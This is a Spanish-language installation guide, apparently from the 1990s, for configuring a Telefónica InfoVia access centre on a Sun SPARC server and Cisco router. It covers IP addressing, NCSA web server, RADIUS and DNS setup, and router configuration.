        * CPI accesible solo desde InfoVia: 1 PVC como minimo.
          Interfaz ethernet: 1 direccion y mascara IP dentro del rango de
          direcciones utilizado en InfoVia. Interfaz serie: tantas
          subinterfaces como el numero de CSIVs de InfoVia a los que esta
          conectado el CPI. A cada subinterfaz se le asigna un PVC que conecta
          con un determinado CSIV. 
        * CPI accesible desde InfoVia e Internet: 2 PVCs como minimo.
          Interfaz ethernet: 2 direcciones y las correspondientes mascaras IP.
          Una dentro del rango de direcciones empleado en InfoVia, y la otra
          dentro del rango de direcciones validas de Internet asignado por el
          IANA al proveedor. 
        Interfaz serie: 2 o mas subinterfaces. A una de las subinterfaces se
          le asigna el PVC que conecta con Internet. A las restantes 
          subinterfaces se les asignan los restantes PVCs del enlace frame
          relay, ya que son los PVCs que permiten la conexion del CPI con los
          CSIVs de InfoVia.
        * CPI con acceso a Internet desde InfoVia: 2 PVCs como minimo.

        Interfaz ethernet: 2 direcciones y las correspondientes mascaras IP.
          Una dentro del rango de direcciones empleado en InfoVia, y la otra
          dentro del rango de direcciones validas de Internet asignado por el
          IANA al proveedor.
        Interfaz serie: 2 o mas subinterfaces. A una de las subinterfaces se
          le asigna el PVC que conecta con Internet. A las restantes 
          subinterfaces se les asignan los restantes PVCs del enlace frame
          relay, ya que son los PVCs que permiten la conexion del CPI con los
          CSIVs de InfoVia.

. Una maquina  UNIX, siempre que la capacidad (velocidad, disco duro, ...) sea
suficiente  como para  soportar  todos los  servicios  de informacion  que  se
pretende que  de el CPI. El numero de interfaces a configurar en la maquina es
el siguiente:

        * CPI accesible solo desde Internet: 1 direccion y mascara IP, dentro
          del rango de direcciones validas de Internet asignado por el IANA
          al proveedor. 
        * CPI accesible solo desde InfoVia: 1 direccion y mascara IP, dentro
          del rango de direcciones empleado en InfoVia.
        * CPI accesible desde InfoVia e Internet: 2 direcciones y mascaras IP.
          Una dentro del rango de direcciones empleado en InfoVia, y la otra
          dentro del rango de direcciones validas de Internet asignado por el
          IANA al proveedor. 
        * CPI con acceso a Internet desde InfoVia: 2 direcciones y mascaras
          IP. Una dentro del rango de direcciones empleado en InfoVia, y la
          otra dentro del rango de direcciones validas de Internet asignado
          por el IANA al proveedor. 


4 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE SUN SPARC 
  ==================================================

La mejor manera de explicar como se ha de instalar un CPI es ilustrarlo con un
ejemplo.   En   este   capitulo  se   presenta  un  ejemplo  de  un  CPI.  Las
caracteristicas de este CPI son las que se enumeran en la siguiente lista:

. Tipo  del CPI:  es un  CPI con  acceso a Internet desde InfoVia. El CPI esta
conectado a dos CSIV de InfoVia: el CSIV de Madrid y el CSIV de Barcelona.

. Servicios ofrecidos por el CPI: 

        * Servidor de web para InfoVia.
        * Servidor de web para Internet. 
        * Servicio de pasarela a Internet. 

. Direcciones IP del CPI: 

        * Direcciones en InfoVia:

          El centro tiene asignado un rango de 256 direcciones en InfoVia.
          Este rango se emplea para dar direcciones de InfoVia a las maquinas
          del centro.
          Direcciones: Para las maquinas del centro: 10.128.102.0 a
                       10.128.102.255. 

        * Direcciones en Internet (asignadas por el IANA al proveedor):

          El centro tiene asignada una clase C de direcciones en Internet:
          Direcciones: 194.179.42.0 a 194.179.42.255 

. El  servidor de RADIUS  del CSIV es el que se encarga de asignar direcciones
de  InfoVia a  los usuarios  llamantes a cada uno de los CPIs conectados a ese
CSIV.  Son por  tanto los  CSIV de  Madrid y Barcelona los que controlaran los
``pools'' de direcciones de InfoVia.

. Para  los usuarios  que accedan  a  Internet desde  InfoVia,  el  CPI  tiene
definido un ``pool'' (rango) de direcciones que puede asignar dinamicamente  a
los  usuarios llamantes.  Este ``pool'' a su vez se divide en dos  rangos, uno
para  los usuarios  llamantes  al CSIV  de  Madrid y  otro  para los  usuarios
llamantes  al  CSIV  de  Barcelona.  Este ``pool''  comprende  las  siguientes
direcciones:

       * ``Pool'' de direcciones para los usuarios llamantes al CSIV de Madrid.
         De 194.179.42.129 a 194.179.42.158, es decir un rango de 30 direcc.
       * ``Pool'' de direcciones para los usuarios llamantes al CSIV de
         Barcelona. De 194.179.42.161 a 194.179.42.190, es decir un rango de
         30 direcciones.
 
Cuando  cualquiera de los dos CSIV (Madrid o Barcelona) detecta que un usuario
quiere acceder  a Internet a traves de este CPI, el cliente de RADIUS del CSIV
correspondiente  consultara al  servidor RADIUS del CPI elegido por el usuario
llamante.

El equipamiento del CPI es el siguiente: 

. Una  maquina Sun SPARC-20, equipada con una unica interfaz ethernet. Sistema
operativo SunOS 5.3, con Open Windows 3.4 y Netra Internet Server 2.0. 

. Un ``router'' CISCO 2500 equipado con una interfaz ethernet y dos interfaces
serie.  Solo se  van  a emplear  la  interfaz ethernet y una de las interfaces
serie.

. Un  enlace frame  relay a 48 Kbit/s con tres PVCs, el 17 (para Internet), el
18 (para  el CSIV  de Madrid),  y el  19 (para el CSIV de Barcelona). Cada PVC
garantiza una velocidad minima de 16 Kbit/s.

. Un ``hub''  con 8  tomas. Por  tanto, la RAL del CPI se ha construido con el
``hub'' y cables de pares trenzados (UTP). 
 
En  los siguientes  apartados  se detalla  la configuracion de cada una de las
maquinas que integran el CPI del ejemplo.


4.1 CONFIGURACION DE LA MAQUINA UNIX. 
    --------------------------------

En la maquina UNIX del CPI se han instalado los siguientes servidores:

. Un  servidor de  web  NCSA. Se  configura  de modo  que se comporte como dos
servidores  de web  independientes. Uno  de ellos dara servicio a los usuarios
que  accedan  por Internet,  mientras que  el segundo  da servicio  a  los que
accedan por InfoVia.

. Un  servidor de  RADIUS cuya  mision  es la  de  asignar  dinamicamente  las
direcciones del ``pool'' de direcciones de Internet manejado por el CPI.

. Un servidor DNS. 

En los siguientes puntos se detalla la configuracion de la maquina asi como de
los diferentes servidores instalados en ella. 


4.1.1 Configuracion de direcciones, interfaces y rutas.
      ------------------------------------------------

La  maquina solo  dispone de  una interfaz, la le0, a la que se le asignan dos
direcciones IP. Estas direcciones son: 

        . Direccion IP de Internet: 194.179.42.2 
        . Direccion IP de InfoVia: 10.128.102.2

En el ejemplo se ha supuesto que el proveedor divide la clase C (256 dir.) que
se  le ha  concedido en  subredes de  64 maquinas cada una. Por otra parte, en
InfoVia, para  los usuarios  llamantes y los CPIs se asignan direcciones de la
clase A 10.0.0.0  reservada por Internet para redes privadas. Esta  clase A se
subdivide  en dos redes,  la  que  va de 10.0.0.0  a 10.127.255.255  para  los
usuarios,  mientras que  las direcciones  10.128.0.0 a 10.255.255.255 para los
CPIs. De acuerdo con esto, las mascaras correspondientes seran:

        . Mascara para la direccion IP de Internet: 255.255.255.192
        . Mascara para la direccion IP de InfoVia: 255.128.0.0

En lo que a rutas se refiere, ha de habilitarse una ruta que permita encaminar
el trafico  de los usuarios de InfoVia y el trafico con el CSIV. En esta ruta,
todo el trafico de las direcciones que van de la 10.0.0.0 a la 10.127.255.255,
ha de encaminarse a traves del ``router'' del CPI, el 10.128.102.1, y  ademas,
permite que los paquetes salientes de la maquina tengan  como direccion origen
la de InfoVia.

Los ficheros necesarios para configurar las direcciones son: 

        . /etc/hosts 
        . /etc/nodename 
        . /etc/hostname.le0 
        . /etc/hostname.le0:1 
        . /etc/netmasks 
        . /etc/defaultrouter 
        . /etc/rc2.d/S72inetsvc 

El  contenido  de  estos  ficheros  es  el  que  se  indica  en  los  proximos
subapartados.


4.1.1.1 Fichero /etc/hosts 
        ------------------

127.0.0.1 localhost loghost timehost 
194.179.42.2 maquina 
10.128.102.2 maquina-inf 
194.179.42.1 router 
10.128.102.1 router-inf 


4.1.1.2 Fichero /etc/nodename 
        ---------------------

maquina 


4.1.1.3 Fichero /etc/hostname.le0 
        ------------------------- 

maquina 
 

4.1.1.4 Fichero /etc/hostname.le0:1 
        ---------------------------

maquina-iv 


4.1.1.5 Fichero /etc/netmasks 
        ---------------------

Por medio de este fichero se definen las mascaras a aplicar en cada una de las
interfaces (ya sean hardware o software) de la maquina.

194.179.42.0 255.255.255.192 
10.0.0.0 255.128.0.0 


4.1.1.6 Fichero /etc/defaultrouter 
        --------------------------

Este fichero indica cual es el ``router'' por defecto de la maquina. Es decir,
a que ``router'' se ha de enviar todo el trafico que llegue a la maquina y que
esta  no sepa  por donde encaminar segun las rutas definidas. El contenido del
fichero es:

router 


4.1.1.7 Fichero /etc/rc2.d/S72inetsvc 
        -----------------------------

En este fichero se pueden configurar y activar o desactivar interfaces.
Tambien  en este  fichero se definen rutas. En este fichero ha de incluirse el
siguiente comando  UNIX, con  el objeto  de asignar  a la  interfaz le0  de la
maquina una segunda direccion IP, la correspondiente a InfoVia. 
/usr/sbin/ifconfig le0:1 10.128.102.2 netmask 255.128.0.0 up 
 
Esta  ultima  instruccion  no  es  necesaria  si  se  ha  creado   el  fichero
/etc/hostname.le0:1 en el que se le dice a la maquina la direccion de InfoVia,
y  en el  fichero /etc/netmasks  se le ha asignado la mascara 255.128.0.0 a la
red 10.0.0.0.  Para  que el  CPI  pueda encaminar  el  trafico de los usuarios
llamantes a InfoVia y que los paquetes con destino a esos usuarios tengan como
direccion  origen la  de InfoVia,  hay que  definir en el fichero la siguiente
ruta:

/usr/sbin/route add net 10.0.0.0 10.128.102.1 1 

Para  que el  CPI pueda encaminar la informacion con destino al cliente RADIUS
del CSIV de InfoVia al que se ha conectado, asi como al ``router'' del CSIV al
que se conecta el CPI, debe incluirse en el fichero estas rutas:

/usr/sbin/route add host 172.16.192.1 10.128.102.1 1 
/usr/sbin/route add host 172.16.193.1 10.128.102.1 1 

Si  en un futuro  se aaden mas CSIVs, deberan aadirse mas rutas de ``hosts''
como las  anteriores. Lo unico que cambiara es la direccion IP de lo ``hosts''
de los nuevos CSIVs.


4.1.2 Configuracion del servidor de web
      ---------------------------------

Para instalar  un servidor  de web NCSA, y que se comporte como dos servidores
independientes, han de configurarse los siguientes ficheros: 

. /opt/SUNWweb/sun_httpd/conf/httpd.conf 
. /opt/SUNWweb/sun_httpd/conf/access.conf 
. /opt/SUNWweb/sun_httpd/conf/srm.conf 

La ruta  de acceso (``path'') de los tres ficheros anteriores no tiene por que
ser esa, ya que puede instalarse el servidor en otro sitio. Pero en el ejemplo
que  aqui  se  presenta,  se  ha  instalado  el  servidor  en   el  directorio
opt/SUNWweb/sun_httpd.  Los  tres  ficheros  de  configuracion   del  servidor
instalado estan en el directorio /opt/SUNWweb/sun_httpd/conf.
 

4.1.2.1 Fichero httpd.conf 
        ------------------

# standalone configuration (not inetd spawned) 
# This is the main server configuration file 
ServerType standalone 
Port 80 
User nobody 
Group nobody 
ServerName maquina.subdominio.dominio.es 
ServerAdmin postmaster@maquina.subdominio.dominio.es 
ServerRoot /opt/SUNWweb/sun_httpd 
ErrorLog logs/error_log 
TransferLog logs/access_log 
PidFile logs/htppd.pid 
<VirtualHost maquina_inf> 
ServerName maquina_inf 
ServerAdmin postmaster@maquina_inf 
DocumentRoot /opt/SUNWweb/htdocs/maquina_inf 
ErrorLog logs/1-error_log 
TransferLog logs/1-access_log 
</VirtualHost> 


4.1.2.2 Fichero access.conf 
        -------------------

# access.conf: Global access configuration 
# Access permissions for your executable CGI programs 
<Directory /opt/SUNWweb/cgi-bin> 
Options Indexes FollowSymLinks 
</Directory> 
 
# Access permissions for your html files 
<Directory /opt/SUNWweb/htdocs> 
Options Indexes FollowSymLinks Includes 
AllowOverride All 
<Limit GET> 
order allow, deny 
allow from all 
</Limit> 
</Directory> 
# Place any other directories you wish to access here 


4.1.2.3 Fichero srm.conf 
        ----------------

# 
DocumentRoot /opt/SUNWweb/htdocs/maquina 
Alias /icons /opt/SUNWweb/images 
ScriptAlias /cgi-bin/ /opt/SUNWweb/cgi-bin/ 
# 
UserDir public_html 
DirectoryIndex index.html 
FancyIndexing on 
AddIconByType (TXT,/icons/text.xbm) text/* 
AddIconByType (IMG,/icons/image.xbm) image/* 
AddIconByType (SND,/icons/sound.xbm) audio/* 
AddIcon /icons/movie.xbm .mpg .qt 
AddIcon /icons/binary.xbm .bin 
AddIcon /icons/back.xbm .. 
AddIcon /icons/menu.xbm ^^DIRECTORY^^ 
AddIcon /icons/blank.xbm ^^BLANKICON^^ 
DefaultIcon /icons/unknown.xbm 
ReadmeName README 
HeaderName HEADER 
IndexIgnore */.??* *~ *# */HEADER* */README* 
AccessFileName .htaccess 
DefaultType text/plain 
# 
# Advanced topics - see tutorial 
# 
#AddEncoding x-compress Z 
#AddEncoding x-gzip gz 
# If you want to use server side includes, or CGI outside 
# ScriptAliased directories, uncomment the following lines. 
#AddType text/x-server-parsed-html .html 
#AddType text/x-server-parsed-html .shtml 
#AddType application/x-httpd-cgi .cgi 


4.1.3 Configuracion del servidor de RADIUS
      ------------------------------------

El  CPI elegido  para  el ejemplo  permite  el acceso  a  Internet a traves de
InfoVia. Por lo tanto debera instalarse en la maquina UNIX del CPI un servidor
de  RADIUS que  gestione  el ``pool''  de direcciones  de  Internet y las vaya
asignando a  los usuarios llamantes. En el ejemplo propuesto, este ``pool'' de
direcciones  IP asignadas  por el  IANA al proveedor esta dividido a su vez en
dos ``pools'', uno para el CSIV de Madrid y otro para el CSIV de Barcelona. El
rango asignado al primer CSIV es el que va de la direccion 194.179.42.129 a la
194.179.42.158.  El  rango  asignado  al  segundo  CSIV  va  de  la  direccion
194.179.42.161  a  la 194.179.42.190.  Para  obtener el fichero ejecutable del
servidor, los  ficheros fuente del servidor RADIUS deberan compilarse para una
maquina  UNIX de  Sun  con sistema  operativo  Solaris 2.4.  En el ejemplo, el
servidor RADIUS del CPI se ha instalado en el directorio:

/export/home/prueba/radius_cpi_pr 

Los  ficheros del  servidor,  almacenados en  el  directorio anterior, son los
siguientes: 

. radius 
Para  obtener el  fichero  ejecutable del  servidor,  los ficheros  fuente del
servidor  RADIUS deberan  compilarse  para una maquina UNIX de SUN. El fichero
ejecutable se ha situado en el directorio /export/home/prueba/radius_cpi_pr.
 
Arranque desde el directorio /export/home/prueba/radius_cpi_pr del comando:

nohup radius -d . & 

Si se  quieren obtener trazas del servidor RADIUS, deberan ejecutarse desde el
directorio /export/home/prueba/radius_cpi_pr los siguientes comandos: 

touch Activar.radius1 
touch Activar.radius2 

Es  el fichero  ejecutable  del servidor.  El  servidor  estara  activo  si al
ejecutar el comando:

ps -ef | grep radius 

Se obtiene como respuesta: 

prueba 24024 23998 4 16:28:00 pts/1 0:00 grep radius 
prueba 22623 1 71 Oct 16 pts/0 0:01 radius -d . 

Las opciones con las que se ejecuta el comando radius son: 

        * -d <nombre_del_directorio_radius> 

. cfg_local_INFOVIA 
En este fichero se indica el nombre y el tipo del servicio ofrecido por el CPI.

. clientes_INFOVIA 
Datos de los CSIV con los que se va a conectar el CPI. En este fichero

tambien  se define  el comienzo  y tamao del ``pool'' de direcciones manejado
por el CPI. 

. usuarios_INFOVIA 
Datos de los usuarios autorizados por el CPI. 

. README 
Este  fichero contiene  una  ayuda que  puede  resultar muy  util a la hora de
instalar el servidor. Ademas, en el fichero /etc/services se ha  de configurar
el puerto  UDP usado por radius. Por defecto toma 1645. En el directorio en el
que  se instala  el servidor,  se crea un subdirectorio en el que se almacenen
los  ficheros con  las  trazas de  todas las conexiones hechas al servidor por
parte del cliente RADIUS del CSIV al que se ha conectado el CPI. 
 

4.1.3.1 Fichero cfg_local_INFOVIA 
        -------------------------

# FICHERO: cfg_local_INFOVIA 
# ================= 
# Este fichero contiene los datos de configuracion de un servidor
RADIUS 
# 
# El primer campo indica el tipo de dato descrito: 
# ALIAS ==> Nombre del servicio soportado en el servidor local. Se
pueden 
# asignar cualquier numero de ALIAS al servicio. Por defecto 
# el nombre del servicio es el nombre de la maquina. 
# TIPO ==> Indica el tipo de servicio soportado en el servidor local.
Solo 
# puede existir una linea de este tipo. 
# 1 ==> Servicio autentificado+rango IP propio. En este caso 
# los valores del rango IP se toman de la definicion 
# de los clientes. No obstante los usuarios deberan 
# definirse con la direccion 0xFFFFFFFF 
# 2 ==> Servicio autentificado. En este caso no se hace caso 
# del rango IP definido en el fichero de clientes. Los 
# usuarios deberan definirse con la direccion 0xFFFFFFFE 
# 3 ==> Servicio normal, en este caso se considera buena 
# la direccion del usuario (pudiendo ser cualquiera 
# incluido los valores 0xFFFFFFFF o 0xFFFFFFFE 
# UDP ==> Indica el puerto UDP usado por por el proceso para escuchar 
# peticiones. Si falta este campo se toma el puerto definido en 
# /etc/services. Si en el /etc/services no esta definido 
# se toma como puerto el valor 1645. 
#IDENTIFICADOR VALOR 
#------------- ----- 
ALIAS cpi_pr 
TIPO 1 
UDP 1645 

 
4.1.3.2 Fichero clientes_INFOVIA 
        ------------------------

# FICHERO: clientes_INFOVIA 
# ================ 
# 
# Este fichero contiene una lista de cliente (maquinas IP) que 
# estan autorizadas a lanzar preguntas RADIUS sobre ESTE servidor 
# y a recibir respuestas RADIUS desde ESTE servidor. 
# 
# 1.- El primer campo es el nombre del cliente 
# 2.- El segundo campo es la palabra clave asociada a ese cliente. 
# 3.- El tercer campo es la primera direccion IP del rango de 
# direciones IP asignadas a los usuarios cuya autentificacion 
# se realiza desde ese cliente. 
# 4.- El cuarto campo es el tamano del rango de direcciones IP
asociado 
# a ese cliente. 
# 5.- Indica el tipo de cliente (sw==INFOVIA==0) o 
# (hw==ASCEND==1) 
# 6.- Indica el puerto UDP del cliente (solo usado si es sw para 
# el sincronismo inicial) 
# 7.- Indica el password del equipo hardware asociado como cliente
(solo 
# usado si el cliente es hardware. 
# 8.- Contiene la Identidad del equipo hw. Solo es significativo si 
# el host es el CSIV. 
# 
# CAMPOS 
# 1 2 3 4 5 6 7 8 
172.16.192.1 ascend 194.179.42.129 30 0 1645 12345 1 
172.16.193.1 ascend 194.179.42.161 30 0 1645 12345 1 


4.1.3.3 Fichero usuarios_INFOVIA
        ------------------------

# FICHERO: usuarios_INFOVIA
# ================ 
# 
# This file contains security and configuration information 
# for each user. The first field is the user's name. 
# This is followed (on the same line) with the list of authentication 
# requirements for that user. This can include password, user name, 
# and an expiration date of the user's password. When an 
# authentication request is received from the Pipeline, these values 
# are tested. A special user named "DEFAULT" can be created (and 
# should be placed at the end of the user file) to specify what to do 
# with users not contained in the user file. A special password of 
# "UNIX" can be specified to notify the authentication server to use 
# UNIX password (/etc/passwd) authentication for this user. 
# 
# Indented (with the tab character) lines following the first 
# line indicate the configuration values to be passed back to 
# the Pipeline to allow the initiation of a user session. 
# This can include things like the PPP configuration values. 
# 
# A pseudo user to profide a login banner and list of hosts 
# used when lan modem users dial in and the device is configured 
# for menu mode. 
# Este fichero contiene el formato definido por ASCEND para 
# su interfaz por RADIUS. 
# Ademas de los parametros definidos por ASCEND el sistema 
# INFOVIA ha definido/modificado los siguientes valores: 
# - SESIONES-INFOVIA = N 
# Donde N es el numero de sesiones simultaneas que se quieren 
# permitir 
# para cada usuario definido en el fichero. 
# - Framed-Address = Este parametro NO debe aparecer en el perfil 
# de usuario o bien tendra el valor 255.255.255.255 
# En caso contrario puede provocar errores en la direccion asignada 
# al usuario. 
# A continuacion se indican varios perfiles de usuario: 
usu1 Password = "madrid" 
a) SESIONES-INFOVIA = 1, 
User-Service = Framed-User, 
Framed-Protocol = PPP, 
Framed-Address = 255.255.255.255, 
Framed-Netmask = 255.255.255.255, 
Ascend-Metric = 2, 
Framed-Routing = None, 
Framed-Compression = 0 
Ascend-Idle-Limit = 0 


4.1.4 Configuracion del servidor DNS
      ------------------------------

El  servidor DNS  se ha instalado en la misma maquina que el servidor RADIUS y
el  servidor NCSA.  Para  configurar el  servidor  DNS, se ha de incluir en el
directorio  /etc  de la maquina UNIX el fichero named.boot. En este fichero se
define de que dominios es servidor de nombres la maquina. Tambien se indica en
que  directorio se  encuentran los ficheros que emplea el servidor DNS para la
traduccion  de nombres  a direcciones, y viceversa. Para comprobar que una vez
arrancada la maquina el servidor DNS esta activo, se puede emplear el comando:

ps -ef | grep in.named 

Si el servidor esta activo, la respuesta al comando anterior sera similar a la
siguiente:

root 244 1 80 Dic 15 ? 50:19 /usr/sbin/in.named 
root 20858 8639 6 08:25:56 pts/12 0:00 grep in.named 

En  los  siguientes  apartados,  se adjuntan  los  listados  de  los  ficheros
empleados por el servidor DNS.
 

4.1.4.1 Fichero /etc/named.boot 
        -----------------------

Es  el primer  fichero de configuracion de un servidor DNS. En este fichero se
encuentran los parametros basicos.

. En  que directorio  se encuentran  los  restantes  ficheros  que  precisa el
servidor DNS.

. Los dominios de los que es servidor primario. 

. Los  dominios de  los que  es servidor secundario. En el ejemplo no lo es de
ninguno.  En este  fichero  las lineas  se  comentan por  medio  de ``;''.  El
contenido del fichero /etc/named.boot es el siguiente:

directory /var/named 
cache . db.cache 
primary cpi.telefonica.es db.cpi.telefonica.es 
primary 42.179.194.IN-ADDR.ARPA db.194.179.42 
primary 10.IN-ADDR.ARPA db.10 
primary 0.0.127.IN-ADDR.ARPA db.127.0.0 

La  primera linea  no comentada seala el directorio en el que estan todos los
ficheros  de datos  que se referencian posteriormente. En la linea que empieza
por cache ..., se indica que en el fichero db.cache se encuentran los datos de
los  servidores de los  dominios raiz.  Este fichero se  obtiene a  traves del
proveedor  de Internet  (IBERNET, red IRIS, ...). En las  lineas que comienzan
por  primary se  indica de que  dominios es servidor primario el servidor DNS.
Tambien  se indican  los ficheros con  la informacion  de esos  dominios.  Los
dominios  42.179.194.IN-ADDR.ARPA, 10.IN-ADDR.ARPA y 0.0.127.IN-ADDR.ARPA  son
los que  permiten dada una direccion de las clase 194.179.42.0 y 10.0.0.0, asi
como  la direccion  127.0.0.1, obtener  el  nombre correspondiente.  Si  fuese
servidor  secundario de  algun  dominio, se pondria en primer lugar secondary,
luego el nombre del dominio del que fuese servidor secundario, en tercer lugar
la  direccion IP  del servidor  DNS primario  de ese  dominio, y por ultimo el
nombre  del fichero  en el que se va a almacenar la informacion de ese dominio
proporcionada por el servidor primario al secundario.


4.1.4.2 Fichero /var/named/db.cpi.telefonica.es 
        ---------------------------------------

@ IN SOA maquina.cpi.telefonica.es. 
postmaster.cpi.telefonica.es. 
( 
96013000 ; Serie 
28800 ; Refresco 8 horas 
7200 ; Reintento 2 horas 
604800 ; Expira 7 dias 
86400 ; Minimo TTL 1 dia 
) 
IN NS minerva.ibernet.es. 
IN NS maquina.cpi.telefonica.es. 
maquina.cpi.telefonica.es. IN A 194.179.42.2 
router.cpi.telefonica.es. IN A 194.179.42.1 
cpi.telefonica.es. IN MX 10 194.179.42.2 

El significado de este fichero es el siguiente: 

. @ indica que el dominio que cubre este fichero es cpi.telefonica.es.


. IN indica direcciones de Internet. 

. SOA (``Start Of Authority''): Tipo de recurso. 

. maquina.cpi.telefonica.es  es el  nombre de  la maquina  en la que esta este
fichero.

. postmaster.cpi.telefonica.es  es la  direccion de correo del responsable del
servidor.
 
. El numero de serie es un entero de 32 bits que indica la version del fichero.
Puede construirse  como en  el ejemplo o de cualquier otra forma. Cada vez que
se modifica el fichero, debe incrementarse el numero de serie.

. Refresco  indica cada  cuanto tiempo  (en segundos)  un  servidor de nombres
secundario de un dominio debe consultar al servidor primario del mismo dominio
para ver si es necesaria una actualizacion.

. Reintento  indica cada  cuanto tiempo (en segundos) intentara un servidor de
nombres secundario realizar una consulta en caso de fallo.

. Expiracion  es el  limite  superior de  tiempo (en segundos) que un servidor
secundario usara los datos que no hayan sido refrescados.

. Tiempo  de vida  es el  numero de  segundos, por defecto, que se usara en el
campo  de tiempo  de vida de  los registros de recursos que no tengan indicado
explicitamente otro valor.

. A  continuacion, en el fichero vienen los registros de servidores de nombres
(NS)  donde minerva.ibernet.es  es un  servidor de  nombres secundario y donde
maquina .cpi.telefonica.es es el servidor de nombres primario.

. Los  siguientes registros  son de  direcciones (A) y es a partir de donde el
servidor de nombres obtiene las direcciones. Si en la red hubiese mas maquinas
que las del ejemplo, se incluiria su nombre y direccion en estos registros.

. El ultimo registro es el del Mail Exchanger (MX) y especifica la maquina que
sabe  distribuir el  correo en el  dominio indicado  (o a ciertas maquinas del
dominio). Puede haber mas de un registro de este tipo.


4.1.4.3 Fichero /var/named/db.194.179.42 
        --------------------------------

@ IN SOA maquina.cpi.telefonica.es. 
postmaster.cpi.telefonica.es. 
( 
96013000 ; Serie 
28800 ; Refresco 8 horas 
7200 ; Reintento 2 horas 
604800 ; Expira 7 dias 
86400 ; Minimo TTL 1 dia 
) 
IN NS minerva.ibernet.es. 
IN NS maquina.cpi.telefonica.es. 
2.42.179.194.IN-ADDR.ARPA. IN PTR maquina.cpi.telefonica.es. 
1.42.179.194.IN-ADDR.ARPA. IN PTR router.cpi.telefonica.es. 

En este  fichero, los registros SOA y NS tienen el mismo significado que en el
fichero  anterior (vease   el  apartado  4.1.4.2)   db.cpi.telefonica.es.  Los
registros  de tipo PTR  proporcionan informacion para obtener el nombre de una
maquina a partir de la direccion IP, o a partir de un alias, obtener el nombre
real de la maquina. El formato de estos registros es el siguiente:

direccion _IP_al_reves.IN-ADDR.ARPA IN PTR nombre_maquina
o
alias _de_la_maquina.IN-ADDR.ARPA IN PTR nombre_maquina

De la primera clase de registros de este tipo debe haber tantos registros como
registros del tipo A haya en el fichero del apartado 4.1.4.2 (en el ejemplo el
fichero db.cpi.telefonica.es).


4.1.4.4 Fichero /var/named/db.10 
        ------------------------

@ IN SOA maquina.cpi.telefonica.es. 
postmaster.cpi.telefonica.es. 
( 
96013000 ; Serie 
28800 ; Refresco 8 horas 
7200 ; Reintento 2 horas 
604800 ; Expira 7 dias 
86400 ; Minimo TTL 1 dia 
) 
IN NS maquina.cpi.telefonica.es. 
2.102.128.10.IN-ADDR.ARPA. IN PTR maquina-inf.telefonica.inf. 
 
Los  registros de este fichero tienen el mismo significado que los del fichero
anterior (apartado 4.1.4.3).  Este fichero se ha incluido para que el servidor
pueda  resolver direcciones de InfoVia. La inclusion de este fichero evita que
el servidor DNS propague preguntas sobre direcciones de InfoVia (de la clase A
10.0.0.0)  a otros  servidores DNS  de  Internet. Esto  contribuye  a  separar
claramente lo que es InfoVia de lo que es Internet.


4.1.4.5 Fichero /var/named/db.127.0.0 
        -----------------------------

@ IN SOA maquina.cpi.telefonica.es. 
postmaster.cpi.telefonica.es. 
( 
96013000 ; Serie 
28800 ; Refresco 8 horas 
7200 ; Reintento 2 horas 
604800 ; Expira 7 dias 
86400 ; Minimo TTL 1 dia 
) 
IN PTR maquina.cpi.telefonica.es. 
1.0.0.127.IN-ADDR.ARPA. IN PTR localhost. 

El  registro de  este fichero  tienen el  mismo significado que los de los dos
apartados  anteriores (apartado 4.1.4.3 y apartado 4.1.4.4) y permite resolver
la direccion de bucle. 


4.2 CONFIGURACION DEL ``ROUTER'' 
    ----------------------------

En  este apartado  se adjunta  el fichero  de configuracion del ``router'' del
ejemplo: 

version 10.2 
! 
hostname router 
! 
enable password YYYYYYYY 
! 
ip subnet-zero 
! 
interface Ethernet0 
ip address 10.128.102.1 255.255.255.0 secondary 
ip address 194.179.42.1 255.255.255.192 
! 
interface Serial0 
no ip address 
encapsulation frame-relay IETF 
frame-relay lmi-type ccitt 
! 
interface Serial0.1 point-to-point 
ip address 194.179.6.135 255.255.255.128 
frame-relay interface-dlci 17 
! 
interface Serial0.2 point-to-point 
ip unnumbered Ethernet0 
frame-relay interface-dlci 18 
! 
interface Serial0.3 point-to-point 
ip unnumbered Ethernet0 
frame-relay interface-dlci 19 
! 
interface Serial1 
ip unnumbered Ethernet0 
shutdown 
! 
ip default-network A.B.C.D 
ip route 10.2.0.0 255.254.0.0 Serial0.2 
ip route 194.179.42.128 255.255.255.224 Serial0.2 
ip route 172.16.192.1 255.255.255.255 Serial0.2 
ip route 10.4.0.0 255.254.0.0 Serial0.3 
ip route 194.179.42.160 255.255.255.224 Serial0.3 
ip route 172.16.193.1 255.255.255.255 Serial0.3 
ip route A.B.C.D M A .M B .M C .M D G A .G B .G C .G D 
! 
line con 0 
line aux 0 
line vty 0 4 
password XXXXXXXX 
login 
! 
end 

En el fichero anterior: 

. XXXXXXXX representa la clave necesaria para conectarse al ``router''.

. YYYYYYYY representa la clave necesaria para poder configurar el ``router''.

. A.B.C.D representa la direccion IP correspondiente a la red por defecto.
Se  trata de  direcciones proporcionadas por Internet. Todos los paquetes cuya
direccion no este  recogida en  las tablas de rutas, se enviara a esta red por
defecto a traves del ``gateway'' indicado.

. M A .M B .M C .M D representa la mascara a aplicar a la red por defecto.
Esta mascara la proporcionara Internet.

. G A .G B .G C .G D  representa  el ``gateway'' a traves del cual se encamina
el trafico hacia la red por defecto. Esta direccion la proporcionara Internet.
En el acceso a Internet a traves de InfoVia el rango o ``pool'' de direcciones
de Internet  lo concede el CPI, en  concreto el servidor RADIUS del CPI. En el
ejemplo se han supuesto dos ``pools'' de 30 direcciones cada uno. Uno de estos
``pools''  es para asignar  direcciones IP a los usuarios llamantes al CSIV de
Madrid, y  el otro ``pool''  es para  asignar direcciones  IP a  los  usuarios
llamantes al CSIV  de Barcelona. El ``pool'' correspondiente al CSIV de Madrid
va   de   la  direccion  194.179.42.129  a  la  194.179.42.158.   El  ``pool''
correspondiente  al CSIV  de Barcelona  va de la direccion 194.179.42.161 a la
194.179.42.190. En ambos casos se trata de rangos contenidos en una subred  de
32 maquinas,  por lo  que la  mascara a  emplear es  255.255.255.224. Para que
llegue  la informacion  a los  usuarios llamantes con direcciones IP dentro de
ese rango, es preciso habilitar dos rutas en el ``router'' con los dos CSIV de
InfoVia  (Madrid y  Barcelona) a  los  que  esta  conectado. Estas rutas estan
recogidas en el fichero de configuracion anterior:

ip route 194.179.42.128 255.255.255.224 Serial0.2 
ip route 194.179.42.160 255.255.255.224 Serial0.3 
 
El ``router''  del CPI  ha de saber por donde encaminar el trafico con destino
a los  usuarios de  InfoVia. Para ello se han de definir rutas con los CSIV de
InfoVia con los que esta conectado el CPI.

ip route 10.2.0.0 255.254.0.0 Serial0.2 
